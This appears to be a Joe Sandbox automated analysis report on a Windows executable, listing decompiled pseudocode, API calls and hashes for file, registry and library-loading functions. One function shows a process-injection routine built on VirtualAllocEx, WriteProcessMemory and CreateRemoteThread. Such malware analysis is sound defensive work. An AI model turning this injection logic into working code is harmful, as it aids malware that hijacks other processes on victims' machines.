                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 6346 21735dc-21735f1 6347 21735f3-21735f6 6346->6347 6348 2173608-2173623 6346->6348 6351 217369e-21736a3 6347->6351 6352 21735fc-2173601 6347->6352 6349 2173685-217368f 6348->6349 6350 2173625-2173644 6348->6350 6356 2173695 6349->6356 6357 2173691-2173693 6349->6357 6354 2173667-2173677 CreateFileA 6350->6354 6355 2173646-217364c 6350->6355 6353 21736b0 call 2172d48 6351->6353 6352->6348 6363 2173603 call 2172d48 6352->6363 6364 21736b5-21736b8 6353->6364 6361 217367c-217367f 6354->6361 6355->6354 6360 217364e-217365a 6355->6360 6362 2173697-217369c GetStdHandle 6356->6362 6357->6362 6360->6354 6365 217365c-2173661 6360->6365 6366 21736a5-21736ab GetLastError 6361->6366 6367 2173681-2173683 6361->6367 6362->6361 6363->6348 6365->6354 6366->6353 6367->6364
                                                                                                C-Code - Quality: 72%
                                                                                                			E021735DC(void** __eax, void* __ecx, void* __edx) {
				void* _t15;
				long _t16;
				long _t18;
				void** _t22;
				long _t24;
				signed int _t29;
				long _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t37 = __edx;
				_t33 = __ecx;
				_t22 = __eax;
				if(0xffffffffffff2850 == 0) {
					L4:
					_t22[1] = 0xd7b3;
					_t22[2] = _t37;
					_t22[9] = E021735B4;
					_t22[7] = E021730E4;
					if(_t22[0x12] == 0) {
						_t22[9] = E021730E4;
						if(_t33 == 3) {
							_t15 = GetStdHandle(0xfffffff5);
						} else {
							_t15 = GetStdHandle(0xfffffff6);
						}
					} else {
						_t18 = 0xc0000000;
						_t29 =  *0x219000c; // 0x0
						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x2190758);
						_t24 = 2;
						_t34 = _t33 - 3;
						if(_t34 != 0) {
							_t24 = 3;
							_t35 = _t34 + 1;
							if(_t35 != 0) {
								_t18 = 0x40000000;
								_t22[1] = 0xd7b2;
								if(_t35 + 1 != 0) {
									_t18 = 0x80000000;
									_t22[1] = 0xd7b1;
								}
							}
						}
						_t11 =  &(_t22[0x12]); // 0x2194a24
						_t15 = CreateFileA(_t11, _t18, _t32, 0, _t24, 0x80, 0); // executed
					}
					if(_t15 == 0xffffffff) {
						_t22[1] = 0xd7b0;
						_t16 = GetLastError();
						L18:
						return E02172D48(_t16);
					} else {
						 *_t22 = _t15;
						return _t15;
					}
				}
				if(0xffffffffffff2850 > 3) {
					_t16 = 0x66;
					goto L18;
				}
				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
					E02172D48(_t20);
				}
				goto L4;
			}














                                                                                                0x021735df
                                                                                                0x021735e1
                                                                                                0x021735e5
                                                                                                0x021735f1
                                                                                                0x02173608
                                                                                                0x02173608
                                                                                                0x0217360e
                                                                                                0x02173611
                                                                                                0x02173618
                                                                                                0x02173623
                                                                                                0x02173685
                                                                                                0x0217368f
                                                                                                0x02173697
                                                                                                0x02173691
                                                                                                0x02173697
                                                                                                0x02173697
                                                                                                0x02173625
                                                                                                0x02173625
                                                                                                0x0217362a
                                                                                                0x02173636
                                                                                                0x0217363c
                                                                                                0x02173641
                                                                                                0x02173644
                                                                                                0x02173646
                                                                                                0x0217364b
                                                                                                0x0217364c
                                                                                                0x0217364e
                                                                                                0x02173654
                                                                                                0x0217365a
                                                                                                0x0217365c
                                                                                                0x02173661
                                                                                                0x02173661
                                                                                                0x0217365a
                                                                                                0x0217364c
                                                                                                0x02173673
                                                                                                0x02173677
                                                                                                0x02173677
                                                                                                0x0217367f
                                                                                                0x021736a5
                                                                                                0x021736ab
                                                                                                0x021736b0
                                                                                                0x00000000
                                                                                                0x02173681
                                                                                                0x02173681
                                                                                                0x00000000
                                                                                                0x02173681
                                                                                                0x0217367f
                                                                                                0x021735f6
                                                                                                0x0217369e
                                                                                                0x00000000
                                                                                                0x0217369e
                                                                                                0x02173601
                                                                                                0x02173603
                                                                                                0x02173603
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(C:\Users\user\Desktop\0321423605241625.exe,C0000000,?,00000000,00000002,00000080,00000000,?,02194B88,?,021736D5,02189B26,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 02173677
                                                                                                • GetStdHandle.KERNEL32(000000F5,?,02194B88,?,021736D5,02189B26,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,021949C4,ScanBuffer), ref: 02173697
                                                                                                • GetLastError.KERNEL32(000000F5,?,02194B88,?,021736D5,02189B26,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,021949C4,ScanBuffer), ref: 021736AB
                                                                                                Strings
                                                                                                • C:\Users\user\Desktop\0321423605241625.exe, xrefs: 02173676
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorFileHandleLast
                                                                                                • String ID: C:\Users\user\Desktop\0321423605241625.exe
                                                                                                • API String ID: 1572049330-1913404137
                                                                                                • Opcode ID: e595da7e55952fcf1aa1f7c6c83a7af4c934f848e8899bae03f4a04fe2501fa2
                                                                                                • Instruction ID: 60c50ee7b5801fe0f90cd668184bbe35f0ca71fe7a098a083f4a738438df8d5b
                                                                                                • Opcode Fuzzy Hash: e595da7e55952fcf1aa1f7c6c83a7af4c934f848e8899bae03f4a04fe2501fa2
                                                                                                • Instruction Fuzzy Hash: F1110DA128020099EB28DF2C8988B5669759FC4758F28C3C6F5384F399D731C944DBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02182A58 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                C-Code - Quality: 84%
                                                                                                			E02182A58(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t29;
				void* _t51;
				void* _t65;
				void* _t66;
				intOrPtr _t70;
				intOrPtr _t72;
				char _t73;
				intOrPtr _t77;
				void* _t89;
				void* _t91;
				void* _t92;
				intOrPtr _t93;

				_t73 = __edx;
				_t66 = __ecx;
				_t91 = _t92;
				_t93 = _t92 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				if(__edx != 0) {
					_t93 = _t93 + 0xfffffff0;
					_t29 = E02173EA8(_t29, _t91);
				}
				_t89 = _t66;
				_v5 = _t73;
				_t65 = _t29;
				_t87 = _a8;
				_push(_t91);
				_push(0x2182ba0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				if(_a8 != 0xffff) {
					E02182950(E02177FF8(_t89, _t87 & 0x0000ffff), 0);
					if( *((intOrPtr*)(_t65 + 4)) < 0) {
						E02178200(_t89,  &_v36);
						_v24 = _v36;
						_v20 = 0xb;
						E0217A96C(GetLastError(),  &_v40);
						_v16 = _v40;
						_v12 = 0xb;
						_t70 =  *0x2190d10; // 0x217ff30
						E0217B278(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
						E0217425C();
					}
				} else {
					_t51 = CreateFileA(E02174D64(_t89), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					E02182950(_t51, 0);
					if( *((intOrPtr*)(_t65 + 4)) < 0) {
						E02178200(_t89,  &_v28);
						_v24 = _v28;
						_v20 = 0xb;
						E0217A96C(GetLastError(),  &_v32);
						_v16 = _v32;
						_v12 = 0xb;
						_t72 =  *0x2190eec; // 0x217ff28
						E0217B278(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
						E0217425C();
					}
				}
				_t27 = _t65 + 8; // 0x2180840
				E021748F4(_t27, _t89);
				_pop(_t77);
				 *[fs:eax] = _t77;
				_push(E02182BA7);
				return E021748C4( &_v40, 4);
			}
























                                                                                                0x02182a58
                                                                                                0x02182a58
                                                                                                0x02182a59
                                                                                                0x02182a5b
                                                                                                0x02182a63
                                                                                                0x02182a66
                                                                                                0x02182a69
                                                                                                0x02182a6c
                                                                                                0x02182a71
                                                                                                0x02182a73
                                                                                                0x02182a76
                                                                                                0x02182a76
                                                                                                0x02182a7b
                                                                                                0x02182a7d
                                                                                                0x02182a80
                                                                                                0x02182a82
                                                                                                0x02182a87
                                                                                                0x02182a88
                                                                                                0x02182a8d
                                                                                                0x02182a90
                                                                                                0x02182a98
                                                                                                0x02182b28
                                                                                                0x02182b31
                                                                                                0x02182b38
                                                                                                0x02182b40
                                                                                                0x02182b43
                                                                                                0x02182b4f
                                                                                                0x02182b57
                                                                                                0x02182b5a
                                                                                                0x02182b64
                                                                                                0x02182b71
                                                                                                0x02182b76
                                                                                                0x02182b76
                                                                                                0x02182a9a
                                                                                                0x02182ab4
                                                                                                0x02182abf
                                                                                                0x02182ac8
                                                                                                0x02182ad3
                                                                                                0x02182adb
                                                                                                0x02182ade
                                                                                                0x02182aea
                                                                                                0x02182af2
                                                                                                0x02182af5
                                                                                                0x02182aff
                                                                                                0x02182b0c
                                                                                                0x02182b11
                                                                                                0x02182b11
                                                                                                0x02182ac8
                                                                                                0x02182b7b
                                                                                                0x02182b80
                                                                                                0x02182b87
                                                                                                0x02182b8a
                                                                                                0x02182b8d
                                                                                                0x02182b9f

                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02182BA0,?,?,02180838,00000001), ref: 02182AB4
                                                                                                • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02182BA0,?,?,02180838,00000001), ref: 02182AE2
                                                                                                  • Part of subcall function 02177FF8: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02180838,02182B22,00000000,02182BA0,?,?,02180838), ref: 02178046
                                                                                                  • Part of subcall function 02178200: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02180838,02182B3D,00000000,02182BA0,?,?,02180838,00000001), ref: 0217821F
                                                                                                • GetLastError.KERNEL32(00000000,02182BA0,?,?,02180838,00000001), ref: 02182B47
                                                                                                  • Part of subcall function 0217A96C: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0217C585,00000000,0217C5DF), ref: 0217A98B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                • String ID:
                                                                                                • API String ID: 503785936-0
                                                                                                • Opcode ID: 2aebc2889f3f7c9d03707f52f41826e88e9a1207bf4688b2ca205fad02276206
                                                                                                • Instruction ID: 2ca4fe131b5306fd7da60d5cbdc14fa1c186dd55af531f45c8e70f051a28301f
                                                                                                • Opcode Fuzzy Hash: 2aebc2889f3f7c9d03707f52f41826e88e9a1207bf4688b2ca205fad02276206
                                                                                                • Instruction Fuzzy Hash: A1318370A807489FDB11EFB9C880BAEBBF6AF98700F508465E914A7380D7755A05CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218900C Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 71%
                                                                                                			E0218900C(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, int _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _t27;
				char* _t29;
				void* _t43;
				intOrPtr _t49;
				void* _t53;

				_v12 = __ecx;
				_v8 = __edx;
				_t43 = __eax;
				E02174D54(_v8);
				E02174D54(_v12);
				E02174D54(_a4);
				_push(_t53);
				_push(0x21890ae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t53 + 0xfffffff4;
				RegOpenKeyA(_t43, E02174D64(_v8),  &_v16); // executed
				_t27 = _a4;
				if(_t27 != 0) {
					_t27 =  *(_t27 - 4);
				}
				_t29 = E02174DBC( &_a4);
				RegSetValueExA(_v16, E02174D64(_v12), 0, 1, _t29, _t27); // executed
				RegCloseKey(_v16);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E021890B5);
				E021748C4( &_v12, 2);
				return E021748A0( &_a4);
			}











                                                                                                0x02189013
                                                                                                0x02189016
                                                                                                0x02189019
                                                                                                0x0218901e
                                                                                                0x02189026
                                                                                                0x0218902e
                                                                                                0x02189035
                                                                                                0x02189036
                                                                                                0x0218903b
                                                                                                0x0218903e
                                                                                                0x0218904f
                                                                                                0x02189054
                                                                                                0x02189059
                                                                                                0x0218905e
                                                                                                0x0218905e
                                                                                                0x02189066
                                                                                                0x0218907d
                                                                                                0x02189086
                                                                                                0x0218908d
                                                                                                0x02189090
                                                                                                0x02189093
                                                                                                0x021890a0
                                                                                                0x021890ad

                                                                                                APIs
                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 0218904F
                                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000000,021890AE), ref: 0218907D
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,?,00000000,021890AE), ref: 02189086
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 779948276-0
                                                                                                • Opcode ID: 04d675e9d6aa026645fd3db296be92a7093f7b37bda794274e789ea049c92456
                                                                                                • Instruction ID: 40e263cbd5e3f1739cfa4926128e0f3517215686fb1792f86914371a15331c2e
                                                                                                • Opcode Fuzzy Hash: 04d675e9d6aa026645fd3db296be92a7093f7b37bda794274e789ea049c92456
                                                                                                • Instruction Fuzzy Hash: 0811EC70A80648AFEB00EBA8CC85A9EB7FDEF88700F504475F554D7250DB71AE408E51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02185B0C Relevance: 4.6, APIs: 3, Instructions: 50synchronizationthreadinjectionCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02185B0C(void* __eax, void* __ecx, void* __edx, char _a4, long _a8) {
				void* _t11;
				_Unknown_base(*)()* _t12;
				void* _t13;
				void* _t17;
				void* _t19;
				void* _t26;
				void* _t27;
				void* _t28;

				_t26 = __ecx;
				_t27 = __edx;
				_t19 = __eax;
				 *0x219452c = E02185AD8(__eax, _a8, __ecx);
				 *0x2194528 = E02185AD8(_t19, E02185A30(__edx), _t27);
				_t11 =  *0x219452c; // 0x4a80000
				_t12 =  *0x2194528; // 0x4fa0000
				_t13 = CreateRemoteThread(_t19, 0, 0, _t12, _t11, 0, 0x2194534); // executed
				_t28 = _t13;
				if(_a4 != 0) {
					WaitForSingleObject(_t28, 0xffffffff);
					_t17 =  *0x219452c; // 0x4a80000
					ReadProcessMemory(_t19, _t17, _t26, _a8, 0x2194530);
				}
				return _t28;
			}











                                                                                                0x02185b12
                                                                                                0x02185b14
                                                                                                0x02185b16
                                                                                                0x02185b24
                                                                                                0x02185b3b
                                                                                                0x02185b47
                                                                                                0x02185b4d
                                                                                                0x02185b58
                                                                                                0x02185b5d
                                                                                                0x02185b63
                                                                                                0x02185b68
                                                                                                0x02185b77
                                                                                                0x02185b7e
                                                                                                0x02185b7e
                                                                                                0x02185b89

                                                                                                APIs
                                                                                                  • Part of subcall function 02185AD8: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,02185B24), ref: 02185AED
                                                                                                  • Part of subcall function 02185AD8: WriteProcessMemory.KERNEL32(?,00000000,?,?,02194518,?,00000000,?,00003000,00000040,?,?,?,?,02185B24), ref: 02185AFD
                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,04FA0000,04A80000,00000000,02194534), ref: 02185B58
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02185B68
                                                                                                • ReadProcessMemory.KERNEL32(?,04A80000,?,?,02194530,00000000,000000FF), ref: 02185B7E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcess$AllocCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3966641755-0
                                                                                                • Opcode ID: 26e1363b2482dc558d1ef5338a912b6df4a976e03c60d10bd1cb39fac9ab8cfb
                                                                                                • Instruction ID: a235d10c8e3221ded22eb6fe4f3e455a70af6cd795b43fcda08f831c430c5160
                                                                                                • Opcode Fuzzy Hash: 26e1363b2482dc558d1ef5338a912b6df4a976e03c60d10bd1cb39fac9ab8cfb
                                                                                                • Instruction Fuzzy Hash: 3B014B717802147FE300AAADACC0F6BA2DEDB89721F514526B509D7281CAB0DC428FA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021889A4 Relevance: 4.5, APIs: 3, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 55%
                                                                                                			E021889A4(char __eax, void* __ebx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				void* _t16;
				char _t17;
				void* _t25;
				intOrPtr _t29;
				void* _t35;

				_v12 = __edx;
				_v8 = __eax;
				E02174D54(_v8);
				E02174D54(_v12);
				_push(_t35);
				_push(0x2188a21);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35 + 0xfffffff8;
				_push(0);
				_t16 = E02174D64(_v12);
				_push(_t16); // executed
				L021769E0(); // executed
				_t25 = _t16;
				_t17 = _v8;
				if(_t17 != 0) {
					_t17 =  *((intOrPtr*)(_t17 - 4));
				}
				_push(_t17);
				_push(E02174DBC( &_v8));
				_push(_t25); // executed
				L021769E8(); // executed
				L021769D8();
				_t29 = _t25;
				 *[fs:eax] = _t29;
				_push(E02188A28);
				return E021748C4( &_v12, 2);
			}










                                                                                                0x021889ac
                                                                                                0x021889af
                                                                                                0x021889b5
                                                                                                0x021889bd
                                                                                                0x021889c4
                                                                                                0x021889c5
                                                                                                0x021889ca
                                                                                                0x021889cd
                                                                                                0x021889d0
                                                                                                0x021889d5
                                                                                                0x021889da
                                                                                                0x021889db
                                                                                                0x021889e0
                                                                                                0x021889e2
                                                                                                0x021889e7
                                                                                                0x021889ec
                                                                                                0x021889ec
                                                                                                0x021889f0
                                                                                                0x021889f9
                                                                                                0x021889fa
                                                                                                0x021889fb
                                                                                                0x02188a01
                                                                                                0x02188a08
                                                                                                0x02188a0b
                                                                                                0x02188a0e
                                                                                                0x02188a20

                                                                                                APIs
                                                                                                • _lcreat.KERNEL32(00000000,00000000), ref: 021889DB
                                                                                                • _lwrite.KERNEL32(00000000,00000000,?,00000000,02188A21), ref: 021889FB
                                                                                                • _lclose.KERNEL32(00000000), ref: 02188A01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: _lclose_lcreat_lwrite
                                                                                                • String ID:
                                                                                                • API String ID: 381991513-0
                                                                                                • Opcode ID: 46f45cd5a7e08abf704a5f0eb89b24f02e3292b5fddda05a310e5a62048c5c60
                                                                                                • Instruction ID: b549e2e4478f1b0c8742e2920c39c474393522d4c072a440910a4c5a88bd4e32
                                                                                                • Opcode Fuzzy Hash: 46f45cd5a7e08abf704a5f0eb89b24f02e3292b5fddda05a310e5a62048c5c60
                                                                                                • Instruction Fuzzy Hash: 84014F71680648AFEB10EBA4CC8199EB7FDEB89710F6104B1E844E3290DB319E00CE60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021733C4 Relevance: 3.1, APIs: 2, Instructions: 61fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E021733C4(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t47;
				signed int _t48;
				signed int _t58;

				_t58 = _t48;
				_t47 = __eax;
				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
					E02172D48(0x67);
					_v8 = 0;
				} else {
					if(ReadFile( *__eax, __edx, __eax[2] * _t58,  &_v8, 0) != 0) {
						_v8 = _v8 /  *(_t47 + 8);
						if(_a16 == 0) {
							if(_t58 != _v8) {
								E02172D48(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E02172D48(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}







                                                                                                0x021733cb
                                                                                                0x021733cf
                                                                                                0x021733dc
                                                                                                0x0217343d
                                                                                                0x02173444
                                                                                                0x021733de
                                                                                                0x021733f3
                                                                                                0x02173410
                                                                                                0x02173418
                                                                                                0x02173427
                                                                                                0x0217342c
                                                                                                0x02173433
                                                                                                0x02173433
                                                                                                0x0217341a
                                                                                                0x02173420
                                                                                                0x02173420
                                                                                                0x021733f5
                                                                                                0x021733fa
                                                                                                0x02173401
                                                                                                0x02173401
                                                                                                0x021733f3
                                                                                                0x0217344f

                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 021733EE
                                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 021733F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 1948546556-0
                                                                                                • Opcode ID: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                                                • Instruction ID: 6be172b7c7cc9108e9cac1d865753db43aac57cd87a60d610535756a0b4f440b
                                                                                                • Opcode Fuzzy Hash: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                                                • Instruction Fuzzy Hash: 97111271744118EFDB48DFA9D980A9EB7F9EF98650B1080B6E819DB200E730DE01DB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021733C2 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E021733C2(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
				long _v8;
				void** _t48;
				signed int _t50;
				signed int _t64;

				_push(_t50);
				_t64 = _t50;
				_t48 = __eax;
				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
					E02172D48(0x67);
					_v8 = 0;
				} else {
					if(ReadFile( *__eax, __edx, __eax[2] * _t64,  &_v8, 0) != 0) {
						_v8 = _v8 /  *(_t48 + 8);
						if(_a16 == 0) {
							if(_t64 != _v8) {
								E02172D48(_a4);
								_v8 = 0;
							}
						} else {
							 *_a16 = _v8;
						}
					} else {
						E02172D48(GetLastError());
						_v8 = 0;
					}
				}
				return _v8;
			}







                                                                                                0x021733c7
                                                                                                0x021733cb
                                                                                                0x021733cf
                                                                                                0x021733dc
                                                                                                0x0217343d
                                                                                                0x02173444
                                                                                                0x021733de
                                                                                                0x021733f3
                                                                                                0x02173410
                                                                                                0x02173418
                                                                                                0x02173427
                                                                                                0x0217342c
                                                                                                0x02173433
                                                                                                0x02173433
                                                                                                0x0217341a
                                                                                                0x02173420
                                                                                                0x02173420
                                                                                                0x021733f5
                                                                                                0x021733fa
                                                                                                0x02173401
                                                                                                0x02173401
                                                                                                0x021733f3
                                                                                                0x0217344f

                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 021733EE
                                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 021733F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 1948546556-0
                                                                                                • Opcode ID: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                                                • Instruction ID: 9c6acc47c326201c30fddd450cea4cdb367d9923f6c8ea210bef14267b871525
                                                                                                • Opcode Fuzzy Hash: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                                                • Instruction Fuzzy Hash: C3F03071744118BF9704DAAADC85AAAB7FCEB94660B1084B6F819DB100E770DD009670
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217CAC6 Relevance: 3.0, APIs: 2, Instructions: 34libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 34%
                                                                                                			E0217CAC6(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x217cb3a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x217cb1c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_v12 = LoadLibraryA(E02174D64(_t12));
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(E0217CB23);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}











                                                                                                0x0217cac9
                                                                                                0x0217cacb
                                                                                                0x0217cacf
                                                                                                0x0217cad2
                                                                                                0x0217cad7
                                                                                                0x0217cadc
                                                                                                0x0217cadd
                                                                                                0x0217cae2
                                                                                                0x0217cae5
                                                                                                0x0217cae8
                                                                                                0x0217caed
                                                                                                0x0217caee
                                                                                                0x0217caf3
                                                                                                0x0217caf6
                                                                                                0x0217cb06
                                                                                                0x0217cb0b
                                                                                                0x0217cb0e
                                                                                                0x0217cb11
                                                                                                0x0217cb16
                                                                                                0x0217cb18
                                                                                                0x0217cb1b

                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLibraryLoadMode
                                                                                                • String ID:
